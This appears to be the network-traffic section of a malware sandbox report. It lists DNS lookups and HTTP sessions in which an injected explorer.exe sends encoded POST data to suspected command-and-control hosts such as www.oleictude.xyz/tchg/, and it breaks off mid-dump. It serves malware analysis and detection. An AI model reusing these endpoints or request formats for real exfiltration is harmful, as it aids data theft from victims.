                                                                                                                    May 30, 2023 11:09:29.449692965 CEST1.1.1.1192.168.11.200xf688No error (0)www.dkansai-cp.com183.90.238.43A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:09:43.420993090 CEST1.1.1.1192.168.11.200xca6cNo error (0)www.comoparardefumar.websitecomoparardefumar.websiteCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 30, 2023 11:09:43.420993090 CEST1.1.1.1192.168.11.200xca6cNo error (0)comoparardefumar.website84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:09:56.253150940 CEST1.1.1.1192.168.11.200xe951No error (0)www.albaymedya.comalbaymedya.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 30, 2023 11:09:56.253150940 CEST1.1.1.1192.168.11.200xe951No error (0)albaymedya.com185.106.208.3A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:10:09.499864101 CEST1.1.1.1192.168.11.200x7a3dNo error (0)www.roconsultores.comroconsultores.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 30, 2023 11:10:09.499864101 CEST1.1.1.1192.168.11.200x7a3dNo error (0)roconsultores.com162.215.249.40A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:10:23.107369900 CEST1.1.1.1192.168.11.200x2b5No error (0)www.aurizhon.comaurizhon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 30, 2023 11:10:23.107369900 CEST1.1.1.1192.168.11.200x2b5No error (0)aurizhon.com84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:10:35.830799103 CEST1.1.1.1192.168.11.200x102aNo error (0)www.solarwachstum.com89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:10:49.760382891 CEST1.1.1.1192.168.11.200xd022No error (0)www.ep09.com154.84.88.108A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:10:50.452802896 CEST9.9.9.9192.168.11.200xd022No error (0)www.ep09.com154.84.88.108A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:11:03.602349043 CEST1.1.1.1192.168.11.200x499bNo error (0)www.zinkiggekis.xyz109.123.121.243A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:11:17.031308889 CEST1.1.1.1192.168.11.200x3c0aNo error (0)www.scottsteedley.comscottsteedley.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    May 30, 2023 11:11:17.031308889 CEST1.1.1.1192.168.11.200x3c0aNo error (0)scottsteedley.com162.214.206.200A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:13:37.460772038 CEST1.1.1.1192.168.11.200xd2f8No error (0)www.oleictude.xyz109.123.121.243A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:14:04.863619089 CEST1.1.1.1192.168.11.200x3030No error (0)www.arrangeabreak.com213.171.195.105A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:14:17.581139088 CEST1.1.1.1192.168.11.200xd421Name error (3)www.14-pro-max-sales.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:14:33.034518957 CEST1.1.1.1192.168.11.200xda23No error (0)www.arifsantoso.info45.33.20.235A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:14:33.034518957 CEST1.1.1.1192.168.11.200xda23No error (0)www.arifsantoso.info173.255.194.134A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:14:33.034518957 CEST1.1.1.1192.168.11.200xda23No error (0)www.arifsantoso.info72.14.185.43A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:14:33.034518957 CEST1.1.1.1192.168.11.200xda23No error (0)www.arifsantoso.info45.56.79.23A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:14:33.034518957 CEST1.1.1.1192.168.11.200xda23No error (0)www.arifsantoso.info45.33.2.79A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:14:33.034518957 CEST1.1.1.1192.168.11.200xda23No error (0)www.arifsantoso.info45.33.18.44A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:14:33.034518957 CEST1.1.1.1192.168.11.200xda23No error (0)www.arifsantoso.info45.79.19.196A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:14:33.034518957 CEST1.1.1.1192.168.11.200xda23No error (0)www.arifsantoso.info45.33.30.197A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:14:33.034518957 CEST1.1.1.1192.168.11.200xda23No error (0)www.arifsantoso.info198.58.118.167A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:14:33.034518957 CEST1.1.1.1192.168.11.200xda23No error (0)www.arifsantoso.info96.126.123.244A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:14:33.034518957 CEST1.1.1.1192.168.11.200xda23No error (0)www.arifsantoso.info72.14.178.174A (IP address)IN (0x0001)false
                                                                                                                    May 30, 2023 11:14:33.034518957 CEST1.1.1.1192.168.11.200xda23No error (0)www.arifsantoso.info45.33.23.183A (IP address)IN (0x0001)false
                                                                                                                    • drive.google.com
                                                                                                                    • doc-04-7k-docs.googleusercontent.com
                                                                                                                    • www.1win-legal1.top
                                                                                                                    • www.minskadue.xyz
                                                                                                                    • www.marketing-solution.net
                                                                                                                    • www.tsygy.com
                                                                                                                    • www.cookcollectives.xyz
                                                                                                                    • www.printmyride.store
                                                                                                                    • www.fairbitawayposearisk.com
                                                                                                                    • www.dkansai-cp.com
                                                                                                                    • www.comoparardefumar.website
                                                                                                                    • www.albaymedya.com
                                                                                                                    • www.roconsultores.com
                                                                                                                    • www.aurizhon.com
                                                                                                                    • www.solarwachstum.com
                                                                                                                    • www.ep09.com
                                                                                                                    • www.zinkiggekis.xyz
                                                                                                                    • www.scottsteedley.com
                                                                                                                    • www.oleictude.xyz
                                                                                                                    • www.arrangeabreak.com
                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    0192.168.11.2049759172.217.18.110443C:\Users\user\Desktop\Siirtokuitti_006703.exe
                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    1192.168.11.2049760142.250.186.97443C:\Users\user\Desktop\Siirtokuitti_006703.exe
                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    10192.168.11.204976991.195.240.4580C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:08:29.570107937 CEST391OUTGET /tchg/?O0qEM=Vh+NtSFYOkmwW/joH9vrd5+MSsdMnxV1ssl4yHjdHmi4FIifjhGRd3WP5FLf/k8P5fuqdVgOe83DA0NMx4WBp24AMjol/1MYCA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.marketing-solution.net
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:08:29.835031033 CEST392INHTTP/1.1 200 OK
                                                                                                                    date: Tue, 30 May 2023 09:08:29 GMT
                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                    transfer-encoding: chunked
                                                                                                                    vary: Accept-Encoding
                                                                                                                    x-powered-by: PHP/8.1.17
                                                                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                    pragma: no-cache
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_G5prXlVdwTCD+r+fn7DUuR757YOPr2z5n7y9MQOfiVqPrUIsKJMYVD2ud92lbOMx/7OI0PCOIUgiaYOT9lauGw==
                                                                                                                    last-modified: Tue, 30 May 2023 09:08:29 GMT
                                                                                                                    x-cache-miss-from: parking-6bdbf848bb-p87kt
                                                                                                                    server: NginX
                                                                                                                    connection: close
                                                                                                                    Data Raw: 32 43 46 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 47 35 70 72 58 6c 56 64 77 54 43 44 2b 72 2b 66 6e 37 44 55 75 52 37 35 37 59 4f 50 72 32 7a 35 6e 37 79 39 4d 51 4f 66 69 56 71 50 72 55 49 73 4b 4a 4d 59 56 44 32 75 64 39 32 6c 62 4f 4d 78 2f 37 4f 49 30 50 43 4f 49 55 67 69 61 59 4f 54 39 6c 61 75 47 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6d 61 72 6b 65 74 69 6e 67 2d 73 6f 6c 75 74 69 6f 6e 2e 6e 65 74 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 7a 75 6d 20 54 68 65 6d 61 20 6d 61 72 6b 65 74 69 6e 67 20 73 6f 6c 75 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 61 72 6b 65 74 69 6e 67 2d 73 6f 6c 75 74 69 6f 6e 2e 6e 65 74 20 69 73 74 20 64 69 65 20 62 65 73 74 65 20 51 75 65 6c 6c 65 20 66 c3 bc 72 20 61 6c 6c 65 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 64 69 65 20 53 69 65 20 73 75 63 68 65 6e 2e 20 56 6f 6e 20
                                                                                                                    Data Ascii: 2CF<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_G5prXlVdwTCD+r+fn7DUuR757YOPr2z5n7y9MQOfiVqPrUIsKJMYVD2ud92lbOMx/7OI0PCOIUgiaYOT9lauGw==><head><meta charset="utf-8"><title>marketing-solution.net&nbsp;-&nbsp;Informationen zum Thema marketing solution.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="marketing-solution.net ist die beste Quelle fr alle Informationen die Sie suchen. Von
                                                                                                                    May 30, 2023 11:08:29.835128069 CEST393INData Raw: 61 6c 6c 67 65 6d 65 69 6e 65 6e 20 54 68 65 6d 65 6e 20 62 69 73 20 68 69 6e 20 7a 75 20 73 70 65 7a 69 65 6c 6c 65 6e 20 53 61 63 68 76 65 72 68 61 6c 74 65 6e 2c 20 66 69 6e 64 65 6e 20 53 69 65 20 61 75 66 20 6d 61 72 6b 65 74 69 6e 67 2d 73
                                                                                                                    Data Ascii: allgemeinen Themen bis hin zu speziellen Sachverhalten, finden Sie auf marketing-solution.net alles. Wir ho1Fffen, dass Sie hier das GesuchtAE6e finden!"><link rel="icon" type="image/png" href="//img.sedoparking
                                                                                                                    May 30, 2023 11:08:29.835194111 CEST395INData Raw: 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72
                                                                                                                    Data Ascii: (:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{
                                                                                                                    May 30, 2023 11:08:29.835274935 CEST396INData Raw: 6e 65 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20
                                                                                                                    Data Ascii: ne}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox
                                                                                                                    May 30, 2023 11:08:29.835333109 CEST397INData Raw: 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78
                                                                                                                    Data Ascii: k}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact
                                                                                                                    May 30, 2023 11:08:29.835390091 CEST399INData Raw: 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d
                                                                                                                    Data Ascii: ion:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:
                                                                                                                    May 30, 2023 11:08:29.835474968 CEST400INData Raw: 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72
                                                                                                                    Data Ascii: ound-color:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff
                                                                                                                    May 30, 2023 11:08:29.835530043 CEST401INData Raw: 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 37 30 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65
                                                                                                                    Data Ascii: on:relative;max-width:1700px;margin:0 auto !important}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-
                                                                                                                    May 30, 2023 11:08:29.835609913 CEST403INData Raw: 74 2d 65 6c 65 6d 65 6e 74 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d
                                                                                                                    Data Ascii: t-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-co
                                                                                                                    May 30, 2023 11:08:29.835655928 CEST403INData Raw: 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 66 6f 63 75 73
                                                                                                                    Data Ascii: archive-block__list-element-link:active,.webarchive-block__list-element-link:focus{text-decoration:underline}b
                                                                                                                    May 30, 2023 11:08:29.846292973 CEST404INData Raw: 35 37 30 0d 0a 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 2e 64 6f 6d 61 69 6e 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f
                                                                                                                    Data Ascii: 570ody{margin:0}.domain h1{font-size:2.2em;font-weight:normal;text-decoration:none;text-transform:lowercase;color:#949494}#container-domain{display:block;text-align:center} </style><script type="text/javascript"> var dto = {"uiO


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    100192.168.11.2049859109.123.121.24380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:38.534024000 CEST1823OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.oleictude.xyz
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.oleictude.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.oleictude.xyz/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 67 30 46 54 50 52 78 31 53 62 78 67 4d 72 59 38 58 75 79 73 59 76 61 6f 28 46 78 50 37 4c 42 67 61 6b 62 6f 77 76 67 38 70 65 50 53 77 57 37 6c 6f 5a 77 62 61 75 5a 53 72 52 62 4b 78 65 64 56 4d 55 77 61 39 4b 32 4f 61 4b 61 73 30 58 32 39 70 77 30 62 38 50 7e 34 4a 34 65 75 4b 64 51 41 4c 36 46 73 6f 57 43 59 53 43 79 67 34 6c 43 76 7a 7a 42 6c 53 4d 73 42 39 75 4d 6f 7a 6d 31 4a 73 62 56 57 47 73 6f 42 41 78 48 30 79 44 77 31 41 33 32 6b 6f 64 6b 67 43 30 30 5a 6e 4b 42 36 6f 64 67 32 58 59 68 30 58 4c 57 77 52 43 65 66 47 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=g0FTPRx1SbxgMrY8XuysYvao(FxP7LBgakbowvg8pePSwW7loZwbauZSrRbKxedVMUwa9K2OaKas0X29pw0b8P~4J4euKdQAL6FsoWCYSCyg4lCvzzBlSMsB9uMozm1JsbVWGsoBAxH0yDw1A32kodkgC00ZnKB6odg2XYh0XLWwRCefGA).
                                                                                                                    May 30, 2023 11:13:39.485235929 CEST1823INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:13:39 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    101192.168.11.2049860109.123.121.24380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:41.130824089 CEST1825OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.oleictude.xyz
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.oleictude.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.oleictude.xyz/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 67 30 46 54 50 52 78 31 53 62 78 67 4e 4c 49 38 56 4a 6d 73 66 50 61 72 6a 31 78 50 31 72 42 6b 61 6b 58 6f 77 71 59 73 75 74 72 53 7e 58 4c 6c 70 59 77 62 64 75 5a 53 67 78 62 54 75 4f 64 65 4d 55 38 53 39 4f 79 4f 61 4b 4f 73 79 68 43 39 39 51 30 55 6b 66 7e 5f 65 49 65 76 4f 64 51 57 4c 36 42 65 6f 55 7e 59 52 79 65 67 35 6a 75 76 67 57 39 6d 42 63 73 44 32 4f 4d 76 39 47 31 44 73 62 49 68 47 73 67 72 42 42 28 30 78 6a 51 31 50 58 32 6a 39 39 6b 6e 41 30 31 55 6a 6f 51 6c 6b 38 30 55 46 49 5a 4e 50 37 28 6a 54 41 44 73 57 58 53 4d 43 37 5a 61 6a 64 34 59 6f 74 6a 79 67 37 58 74 68 34 61 55 6c 52 28 6c 54 78 4b 6f 4d 43 31 6d 62 33 69 55 51 36 57 46 47 30 4b 34 75 6a 38 58 55 58 65 48 72 7a 56 52 48 45 59 43 39 6b 4f 6d 61 61 36 78 7a 47 34 6e 62 76 6f 71 31 6a 69 79 6a 59 65 6a 31 49 59 37 69 73 48 61 35 75 70 39 77 5a 43 68 4e 69 79 64 43 79 68 44 34 77 75 49 65 6b 42 30 62 74 68 69 54 61 69 4d 4a 50 6b 4c 32 38 51 74 46 33 38 52 36 44 71 41 67 4f 30 4b 34 50 6d 73 58 7a 34 53 6b 67 70 42 6f 59 41 6b 6c 74 71 46 51 77 4e 64 6f 75 5a 74 46 4e 46 7a 58 6f 34 73 6e 72 58 47 46 72 55 49 7e 6d 73 6d 72 72 58 34 43 48 70 5f 5a 62 5a 37 78 37 42 6f 67 32 7a 43 37 67 79 50 4f 73 61 76 55 34 62 67 38 66 6e 78 75 57 76 65 30 6e 7a 64 39 4c 57 42 68 52 55 58 59 71 48 54 59 57 73 41 72 36 4e 73 49 58 64 4d 49 52 63 6b 35 79 52 63 50 76 65 43 49 32 53 39 52 67 7e 67 35 4d 59 69 73 74 35 42 6f 43 76 43 45 31 70 59 4d 4e 64 51 42 69 42 5a 61 68 28 68 4f 42 78 62 72 55 68 43 37 42 4a 54 44 4a 30 67 62 4f 77 4b 49 34 69 6b 68 2d 5a 7a 68 65 77 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=g0FTPRx1SbxgNLI8VJmsfParj1xP1rBkakXowqYsutrS~XLlpYwbduZSgxbTuOdeMU8S9OyOaKOsyhC99Q0Ukf~_eIevOdQWL6BeoU~YRyeg5juvgW9mBcsD2OMv9G1DsbIhGsgrBB(0xjQ1PX2j99knA01UjoQlk80UFIZNP7(jTADsWXSMC7Zajd4Yotjyg7Xth4aUlR(lTxKoMC1mb3iUQ6WFG0K4uj8XUXeHrzVRHEYC9kOmaa6xzG4nbvoq1jiyjYej1IY7isHa5up9wZChNiydCyhD4wuIekB0bthiTaiMJPkL28QtF38R6DqAgO0K4PmsXz4SkgpBoYAkltqFQwNdouZtFNFzXo4snrXGFrUI~msmrrX4CHp_ZbZ7x7Bog2zC7gyPOsavU4bg8fnxuWve0nzd9LWBhRUXYqHTYWsAr6NsIXdMIRck5yRcPveCI2S9Rg~g5MYist5BoCvCE1pYMNdQBiBZah(hOBxbrUhC7BJTDJ0gbOwKI4ikh-Zzhew.
                                                                                                                    May 30, 2023 11:13:41.649023056 CEST1825INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:13:41 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    102192.168.11.2049861109.123.121.24380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:43.725548983 CEST1838OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.oleictude.xyz
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.oleictude.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.oleictude.xyz/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 67 30 46 54 50 52 78 31 53 62 78 67 4e 4c 49 38 56 4a 6d 73 66 50 61 72 6a 31 78 50 31 72 42 6b 61 6b 58 6f 77 71 59 73 75 74 6a 53 7e 6c 7a 6c 6f 37 49 62 63 75 5a 53 74 52 62 4f 75 4f 64 66 4d 55 30 57 39 4c 71 65 61 49 32 73 79 32 47 39 38 69 63 55 68 66 7e 36 51 6f 65 74 4b 64 51 6b 4c 36 46 43 6f 55 36 49 53 43 36 67 34 68 47 76 69 56 56 6c 4a 73 73 42 32 4f 4d 64 33 6d 30 38 73 62 64 6b 47 73 73 72 42 48 28 30 77 51 34 31 4e 45 65 6a 6d 39 6b 6b 54 55 31 50 71 49 51 71 6b 38 77 71 46 49 5a 64 50 35 50 6a 54 43 62 73 45 47 53 50 42 62 5a 61 39 74 34 62 73 74 6d 37 67 37 4b 75 68 37 47 55 6c 53 28 6c 56 68 4b 6f 49 6a 31 6c 62 58 69 6f 42 71 57 65 43 30 47 77 75 67 42 6d 55 57 36 48 72 48 39 52 47 33 77 43 28 46 4f 6d 58 61 36 7a 75 57 34 30 4f 66 6f 66 31 6a 53 75 6a 63 71 7a 31 4b 55 37 6a 4f 28 61 70 5f 70 2d 6b 4a 43 72 42 43 79 4d 47 79 6c 78 34 77 66 4a 65 6b 41 73 62 76 4e 69 54 71 79 4d 62 4f 6b 49 37 4d 51 71 49 58 39 56 7a 6a 32 61 67 4f 6f 34 34 4f 75 38 58 30 49 53 7e 41 70 42 35 50 63 6a 74 64 71 65 59 51 4e 44 6c 4f 59 74 46 4e 59 69 58 70 39 62 6e 61 37 47 45 62 45 49 6f 57 73 6c 37 4c 58 38 52 6e 70 35 50 72 5a 37 78 37 39 6b 67 32 28 43 75 41 36 50 50 62 32 76 52 76 6e 67 37 